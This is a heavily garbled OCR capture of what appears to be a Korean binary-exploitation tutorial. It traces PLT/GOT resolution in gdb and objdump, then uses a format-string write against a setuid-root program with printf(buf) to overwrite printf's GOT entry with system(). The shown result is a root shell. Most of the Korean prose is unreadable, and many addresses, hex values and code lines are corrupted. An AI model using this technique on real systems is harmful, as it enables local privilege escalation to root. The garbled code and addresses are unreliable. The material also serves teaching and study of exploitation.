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int main{)}

char buf[]=""KEXL¥YYY";
scanf{"%s",buf);
printf{"%s" ,buf);

[rootEkissmefox bufferoverflow]# objdump -h scanff
scanff: file format elf32-i38a6

Sections:

Idx Hame Size UHif LKA File off
-interp 0peeee13 BEOAB114  OEO4E114  0OOBO11L
CONTENTS, ALLOC, LOAD, READOMLY, DATA

.note.ABI-tag 00OOGG20 OBEO4B128 0804128 OOO0B128
CONTENTS, ALLOC, LOAD, READOHMLY, DATA

-hash 0000AA30 OBO4B1L4E O804E14E 0OOOO0O148
CONTENTS, ALLOC, LOAD, READOHMLY, DATH

-dynsym 0poe@ea7e BBEO4B1FE  OBO4E17E  OOBOB178
CONTENTS, ALLOC, LOAD, READOMLY, DATA

-dynstr 00eAAA6G6 PBEO4B1e8 OG804E1e8 OODOA1e8
CONTENTS, ALLOC, LOAD, READOMLY, DATA

-gnu._version O000000e OB04BZ4e O804824e DODDO24e
CONTENTS, ALLOC, LOAD, READOMLY, DATA

-gnu.version_r B00006828 BEB4B25c O884825c BE00B25c
CONTENTS, ALLOC, LOAD, READOMLY, DATA

-rel.dyn 000AAAAE PBOAB2YCc B8M4B27c BOBBB27C
COMTENTS, ALLOC, LOAD, READOMLY, DATA

.rel.plt 0popee18 BEO4BZ28L4 OEOLEZ2BL  DOOOOZBY
CONTENTS, ALLOC, LOAD, READOMLY, DATA

-init 0poeee17 BEO4B29c O804E29c BOB0B27C
CONTENTS, ALLOC, LOAD, READOMLY, CODE

-plt 00eeEA4E BEOABZDL OEG4E2DL  OBOBAZDL
CONTENTS, ALLOC, LOAD, READOMLY, CODE

-text 000861ch BEBLBZ2FL OEOLE2FL  DBOOOZFL
CONTENTS, ALLOC, LOAD, READOMLY, CODE

-Fini ogeAAA1a BEOA4BL4DE A8A4E4DE DOBOOLDLS
CONTENTS, ALLOC, LOAD, READOMLY, CODE

-rodata 0poeee14 BEOABAdDL  OBO4ELdY  OBOOOLAL
CONTENTS, ALLOC, LOAD, READOMLY, DATA

-eh_frane 0pooeees BEO4B4eB OBO4E4eRE OOODOLER
CONTENTS, ALLOC, LOAD, READOHMLY, DATA




gdb 2 CIHZSIH pit HS =feletrt,

(gdb) x/15i 0x080482b4

0x80482b4 <_init+24>: pushl 0x80495d0

0x80482ba <_init+30>: imp *0x80495d4 <- _dl_runtime_resolve() &It Xt2l&= GOT

0x80482c0 <_init+36>: add %al,(%eax)

0x80482c2 <_init+38>: add %al,(%eax)

0x80482c4 <_init+40>: jmp *0x80495d8

0x80482ca <_init+46>: push  $0x0

0x80482cf <_init+51>: imp 0x80482b4 <_init+24> <-PLT 2 S0 Z(mp TH= FAE E22H ¢

O PLT 9992 =01JtA CHAl _dl_runtime_resolve() &I} SEE S &0I8xUS)

0x80482d4 <_init+56>: jmp *0x80495dc

0x80482da <_init+62>: push $0x8

0x80482df <_init+67>: jmp 0x80482b4 <_init+24> <- O0|RX= YAl PLT 2 S0
_dl_runtime_resolve() &8

0x80482e4 <_init+72>: jmp *0x80495e0

0x80482ea <_init+78>: push $0x10

0x80482ef <_init+83>: jmp 0x80482b4 <_init+24>

0x80482f4 <_start>: xor %ebp,%ebp

0x80482f6 <_start+2>: pop %esi

scanff: file format elf32-i386

DYHAMIC RELOCATION RECORDS

OFFSET TYPE UALUE

B8O4O5cH R_38B6_GLOB_DAT __gmon_start__
BeeL05d8 R_386_ JUMP_SLOT scanf

A88495dc R_386_JUMP_SLOT _ libc_start_main
gEeL05ed R 386 JUMP SLOT
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gdbZE SHo= X E &43t9| offset o LG

{gdb}) x/x B8x88495d3
Bx80495d8 < GLOBAL_OFFSET_TABLE_+123: BxB80482cCa

{gdb}) x/= B8z880495e8
0:x80495%e8 < GLOBAL_OFFSET_TABLE +28>: Bz B8 84B2ea
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1. scanf & S& ( 3% 2lo|E2{2|Y. SxXi AU ol ExlstX| L3)

2. PLT 2 0|5

3. imp 7+&£0| 7t2|7|= GOT 2 0|S&

4, GOT o= PLT 9] push 28 727l FAZU0| HEEZN US. CtA| PLT 9 push fLE2Z 0]
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(gdb) break =8:880483f5
Breakpoint 1 at B8xB8483f5: file
(gdb} run
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scanf.c, line 5.

Starting program: fbufferoverflow/scanff

2

Breakpoint 1, Bx888483f5 in main () at scanf.c:5
S _ printf(""%s" ,buf);

(gdb}) =x/x0x080495d8

Bx80495d8 < GLOBAL OFFSET_TABLE +123: Bx883382da

{gdb) x/18i Bx083382dA
8233082dA <scanf>: push
0x3302d1 <scanf+1>: ®or
0x3302d3 <scanf+3:: mou
8x3382d5 <{scanf+5>: push
8x33082d6 <{scanf+6>: call
8x3302db <scanf+11:: add
Bx3302e1 <scanf+17>: sub
Bx3302eh <scanf+208:: lea
8x3382e7 <{scanf+23>:
0x3302ea <scanf+262:

2. PLT 2 0|5
3. imp #E0| 7t2|7|1= GOT 2 0| &
4. GOT off U= 2H o FAZ jump &

ol Lot AtMZ GOT ol 22

M= PLT && 2H™( dl_runtime_resolve())
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%ebp

Zedx,zedx

%esp,%ebp

%ebx

Bx2F4c?1 < i686.get _pc_ thunk.bx>
$0xd2?2d19 ,%ebx

$0x10,%esp

Bxc{%ebp),%eax

B=8{%ebp} ,%ecx

Zeds,Bxc(%esp)
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vinclude <stdio.h

int main{int argc,char =argu[]}

{

char buf[2546];

setuid(@);
strncpy{buf,argqu[i1],sizeof{buf)-1});
printf{buf};

printf{buf};

format string FUAH™S JIX AATEO0|Ct, o TEONAM printf &7 & H ASHg|=
LHOIl M 2 lSt= format string FfHE EHF7| lsiAo|ct. ?/2] ZEE HutAst = setui
Z 50| format string ZAYHOZ GOT 2 system() 42 FOMYAM HES ASHA|IF|A =
HetE a5 & US Aot
HNY 34 ZEE 7857 sl printf &2 GOT EH FAZL} system() &9 F=AZL
5
A5t ZrstCt
tinclude <{stdio.h>
int main()
system(};
X|&ol| break & Z1 system()

{gdb) break =Bx:8304838a

Breakpoint 1 at BxBB4838a

{gdb) run

Starting program: /bufferoverflow/system?
{no debugging symbols found)...{no debuggin

Breakpoint 1, BxB0804838a in main ()
(gdb) x/x system

Bx3147cB {system>: Bx83e58955

lo

ZF24 1 0x003147c0

O
4

system()

[fedoraBkissmefox bufferoverflow]y objdump -R printf

printf: file format elf32-i386

DYNAMIC RELOCATION RECORDS

ool
e
o
>

OFFSET

gee495e8
030495F0
0884954
038495 F8
888495 fc
g2B406008

TYPE

R_386_
R_386_
R_386_
R_386_
R_386_
R_386_

GLOB_DAT

JUMP_SLOT
JUMP_SLOT
JUMP_SLOT
JUMP_SLOT
JUMP_SLOT

UALUE

_ gmon_start__
__libc_start_main

printf
strncpy
setuid

__gmon_start___




printf() &<2| GOT offset : 0x080495f4

ZY AEY BAS s system B0 FAES 2byte M LT S 10742 HEHECL,
0x47c0 — 8 = 18360

sh: .. %18360x%10%47217x%11: command not found

ch-3.00#

sh-3.004#

sh-3.0084# id

uid=8(root) gid=581(fedora) groups=581{fedora)




